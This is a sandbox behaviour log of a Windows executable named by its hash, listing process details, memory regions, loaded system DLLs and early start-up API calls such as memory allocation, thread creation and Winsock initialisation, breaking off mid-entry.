# Flog Txt Version 1 # Analyzer Version: 4.4.1 # Analyzer Build Date: Jan 14 2022 06:06:11 # Log Creation Date: 18.03.2022 08:23:11.924 Process: id = "1" image_name = "ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe" page_root = "0x49349000" os_pid = "0x110c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x4a0" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 122 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 123 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 124 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 125 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 126 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 127 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 128 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 129 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 130 start_va = 0x400000 end_va = 0x60dfff monitored = 1 entry_point = 0x44ba80 region_type = mapped_file name = "ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") Region: id = 131 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 132 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 134 start_va = 0x7fff0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 135 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 136 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 274 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 275 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 276 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 277 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 279 start_va = 0x700000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 280 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 281 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 282 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 283 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 284 start_va = 0x610000 end_va = 0x6cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 369 start_va = 0x743a0000 end_va = 0x74431fff monitored = 0 entry_point = 0x743e0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 370 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 371 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 372 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 373 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 374 start_va = 0x8d0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 375 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 376 start_va = 0x6cd20000 end_va = 0x6cd43fff monitored = 0 entry_point = 0x6cd24820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 377 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 378 start_va = 0x6ccf0000 end_va = 0x6cd12fff monitored = 0 entry_point = 0x6ccf8940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 379 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 380 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 381 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 382 start_va = 0x75120000 end_va = 0x75156fff monitored = 0 entry_point = 0x75123b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 383 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 384 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 385 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 386 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 387 start_va = 0x9d0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 388 start_va = 0x800000 end_va = 0x829fff monitored = 0 entry_point = 0x805680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 389 start_va = 0x9d0000 end_va = 0xb57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 390 start_va = 0xba0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 391 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 392 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 393 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 394 start_va = 0xbb0000 end_va = 0xd30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 395 start_va = 0xd40000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 396 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 397 start_va = 0x2140000 end_va = 0x32341fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 398 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 399 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 400 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 401 start_va = 0x850000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 402 start_va = 0x890000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 403 start_va = 0xb60000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 404 start_va = 0x32350000 end_va = 0x3244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000032350000" filename = "" Region: id = 405 start_va = 0x32450000 end_va = 0x3254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000032450000" filename = "" Region: id = 406 start_va = 0x32550000 end_va = 0x3264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000032550000" filename = "" Region: id = 407 start_va = 0x32650000 end_va = 0x3268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000032650000" filename = "" Region: id = 408 start_va = 0x32690000 end_va = 0x3278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000032690000" filename = "" Region: id = 409 start_va = 0x32790000 end_va = 0x327defff monitored = 0 entry_point = 0x3279d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 410 start_va = 0x327e0000 end_va = 0x327e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000327e0000" filename = "" Region: id = 411 start_va = 0x327f0000 end_va = 0x327f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000327f0000" filename = "" Region: id = 412 start_va = 0x32800000 end_va = 0x32bfafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000032800000" filename = "" Region: id = 413 start_va = 0x32790000 end_va = 0x327cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000032790000" filename = "" Region: id = 1103 start_va = 0x32c00000 end_va = 0x32caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000032c00000" filename = "" Region: id = 6128 start_va = 0x6ddb0000 end_va = 0x6ddc2fff monitored = 0 entry_point = 0x6ddb9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 6129 start_va = 0x700000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 6130 start_va = 0x32cb0000 end_va = 0x32daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000032cb0000" filename = "" Region: id = 6131 start_va = 0x6d1e0000 end_va = 0x6d20efff monitored = 0 entry_point = 0x6d1f95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 6132 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6133 start_va = 0x32db0000 end_va = 0x330e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6237 start_va = 0x71f30000 end_va = 0x71f7efff monitored = 0 entry_point = 0x71f3d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 6241 start_va = 0x740000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 6242 start_va = 0x780000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 6243 start_va = 0x330f0000 end_va = 0x331effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000330f0000" filename = "" Region: id = 6244 start_va = 0x790000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 6246 start_va = 0x7a0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 6247 start_va = 0x331f0000 end_va = 0x332effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000331f0000" filename = "" Region: id = 6248 start_va = 0x332f0000 end_va = 0x3332ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000332f0000" filename = "" Region: id = 6249 start_va = 0x33330000 end_va = 0x3342ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033330000" filename = "" Region: id = 6250 start_va = 0x33430000 end_va = 0x3346ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033430000" filename = "" Region: id = 6251 start_va = 0x33470000 end_va = 0x3356ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033470000" filename = "" Region: id = 6252 start_va = 0x33570000 end_va = 0x335affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033570000" filename = "" Region: id = 6253 start_va = 0x335b0000 end_va = 0x336affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000335b0000" filename = "" Region: id = 6254 start_va = 0x336b0000 end_va = 0x336effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000336b0000" filename = "" Region: id = 6255 start_va = 0x336f0000 end_va = 0x337effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000336f0000" filename = "" Region: id = 6256 start_va = 0x337f0000 end_va = 0x3382ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000337f0000" filename = "" Region: id = 6257 start_va = 0x33830000 end_va = 0x3392ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033830000" filename = "" Region: id = 6258 start_va = 0x33930000 end_va = 0x3396ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033930000" filename = "" Region: id = 6259 start_va = 0x33970000 end_va = 0x33a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033970000" filename = "" Region: id = 6260 start_va = 0x33a70000 end_va = 0x33aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033a70000" filename = "" Region: id = 6261 start_va = 0x33ab0000 end_va = 0x33baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033ab0000" filename = "" Region: id = 6262 start_va = 0x33bb0000 end_va = 0x33beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033bb0000" filename = "" Region: id = 6263 start_va = 0x33bf0000 end_va = 0x33ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033bf0000" filename = "" Region: id = 6264 start_va = 0x33cf0000 end_va = 0x33d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033cf0000" filename = "" Region: id = 6265 start_va = 0x33d30000 end_va = 0x33e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033d30000" filename = "" Region: id = 6266 start_va = 0x33e30000 end_va = 0x33e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033e30000" filename = "" Region: id = 6267 start_va = 0x33e70000 end_va = 0x33f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033e70000" filename = "" Region: id = 6268 start_va = 0x33f70000 end_va = 0x33faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033f70000" filename = "" Region: id = 6269 start_va = 0x33fb0000 end_va = 0x340affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000033fb0000" filename = "" Region: id = 6270 start_va = 0x7e0000 end_va = 0x7e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 6271 start_va = 0x340b0000 end_va = 0x340effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000340b0000" filename = "" Region: id = 6272 start_va = 0x340f0000 end_va = 0x3412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000340f0000" filename = "" Region: id = 6273 start_va = 0x34130000 end_va = 0x3422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034130000" filename = "" Region: id = 6274 start_va = 0x34230000 end_va = 0x3426ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034230000" filename = "" Region: id = 6279 start_va = 0x34270000 end_va = 0x342affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034270000" filename = "" Region: id = 6280 start_va = 0x342b0000 end_va = 0x343affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000342b0000" filename = "" Thread: id = 1 os_tid = 0x1110 [0120.405] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75600000 [0120.406] GetProcAddress (hModule=0x75600000, lpProcName="AddDllDirectory") returned 0x755b45e0 [0120.406] GetProcAddress (hModule=0x75600000, lpProcName="AddVectoredContinueHandler") returned 0x777d28d0 [0120.406] GetProcAddress (hModule=0x75600000, lpProcName="GetQueuedCompletionStatusEx") returned 0x756410f0 [0120.406] GetProcAddress (hModule=0x75600000, lpProcName="LoadLibraryExW") returned 0x75617930 [0120.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74650000 [0122.643] GetProcAddress (hModule=0x74650000, lpProcName="SystemFunction036") returned 0x74442a60 [0122.643] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77720000 [0122.643] GetProcAddress (hModule=0x77720000, lpProcName="NtWaitForSingleObject") returned 0x77796cc0 [0122.643] GetProcAddress (hModule=0x77720000, lpProcName="wine_get_version") returned 0x0 [0122.644] SetErrorMode (uMode=0x2) returned 0x0 [0122.644] SetErrorMode (uMode=0x8003) returned 0x2 [0122.644] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x44bbe0) returned 0x8e39c0 [0122.644] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x44bbf0) returned 0x0 [0122.645] SetConsoleCtrlHandler (HandlerRoutine=0x44bc00, Add=1) returned 1 [0122.645] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0122.646] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x19fe90, lpSystemAffinityMask=0x19fe8c | out: lpProcessAffinityMask=0x19fe90, lpSystemAffinityMask=0x19fe8c) returned 1 [0122.646] GetSystemInfo (in: lpSystemInfo=0x19fe94 | out: lpSystemInfo=0x19fe94*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0122.646] SetProcessPriorityBoost (hProcess=0xffffffff, bDisablePriorityBoost=1) returned 1 [0122.647] VirtualAlloc (lpAddress=0x700000, dwSize=0x30202000, flAllocationType=0x2000, flProtect=0x4) returned 0x0 [0122.647] VirtualAlloc (lpAddress=0x0, dwSize=0x30202000, flAllocationType=0x2000, flProtect=0x4) returned 0x2140000 [0122.673] VirtualAlloc (lpAddress=0x1110c000, dwSize=0x1234000, flAllocationType=0x1000, flProtect=0x4) returned 0x1110c000 [0122.725] VirtualAlloc (lpAddress=0x2140000, dwSize=0x25000, flAllocationType=0x1000, flProtect=0x4) returned 0x2140000 [0122.726] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x800000 [0122.727] VirtualAlloc (lpAddress=0x12340000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x12340000 [0122.730] VirtualAlloc (lpAddress=0x110fc000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x110fc000 [0122.730] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x6e0000 [0122.731] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x840000 [0122.731] SystemFunction036 (in: RandomBuffer=0x609020, RandomBufferLength=0x40 | out: RandomBuffer=0x609020) returned 1 [0122.732] GetEnvironmentStringsW () returned 0x8e5300* [0122.733] FreeEnvironmentStringsW (penv=0x8e5300) returned 1 [0122.734] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19fecc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19fecc*=0x100) returned 1 [0122.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12364000, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0122.735] CloseHandle (hObject=0x104) returned 1 [0122.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12364240, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0122.737] CloseHandle (hObject=0x104) returned 1 [0122.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12364480, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0122.738] CloseHandle (hObject=0x104) returned 1 [0122.738] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x104 [0122.738] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0122.915] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x800) returned 0x75600000 [0122.916] GetProcAddress (hModule=0x75600000, lpProcName="GetStdHandle") returned 0x7561a6e0 [0122.922] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0122.922] GetProcAddress (hModule=0x75600000, lpProcName="SetHandleInformation") returned 0x75626660 [0122.922] SetHandleInformation (hObject=0x38, dwMask=0x1, dwFlags=0x0) returned 1 [0122.922] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0122.922] SetHandleInformation (hObject=0x3c, dwMask=0x1, dwFlags=0x0) returned 1 [0122.922] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0122.922] SetHandleInformation (hObject=0x40, dwMask=0x1, dwFlags=0x0) returned 1 [0122.923] LoadLibraryExW (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x800) returned 0x75310000 [0122.923] GetProcAddress (hModule=0x75310000, lpProcName="WSAStartup") returned 0x75316520 [0122.923] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x12375df4 | out: lpWSAData=0x12375df4) returned 0 [0122.940] GetProcAddress (hModule=0x75600000, lpProcName="CancelIoEx") returned 0x7561f450 [0122.940] GetProcAddress (hModule=0x75600000, lpProcName="SetFileCompletionNotificationModes") returned 0x75619dd0 [0122.942] GetProcAddress (hModule=0x75310000, lpProcName="WSAEnumProtocolsW") returned 0x75327ed0 [0122.942] WSAEnumProtocolsW (in: lpiProtocols=0x1239ef58, lpProtocolBuffer=0x1239ef60, lpdwBufferLength=0x1239ef54 | out: lpProtocolBuffer=0x1239ef60, lpdwBufferLength=0x1239ef54) returned 4 [0123.756] GetProcAddress (hModule=0x75600000, lpProcName="GetConsoleMode") returned 0x75626f70 [0123.756] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x123a3f70 | out: lpMode=0x123a3f70) returned 1 [0123.765] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x32790000 [0123.766] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x123a3f70 | out: lpMode=0x123a3f70) returned 1 [0123.769] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x123a3f70 | out: lpMode=0x123a3f70) returned 1 [0123.770] GetProcAddress (hModule=0x75600000, lpProcName="GetCommandLineW") returned 0x7561aba0 [0123.770] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe\" " [0123.773] GetProcAddress (hModule=0x75600000, lpProcName="GetVersion") returned 0x7561aaf0 [0123.773] GetVersion () returned 0x23f00206 [0123.774] 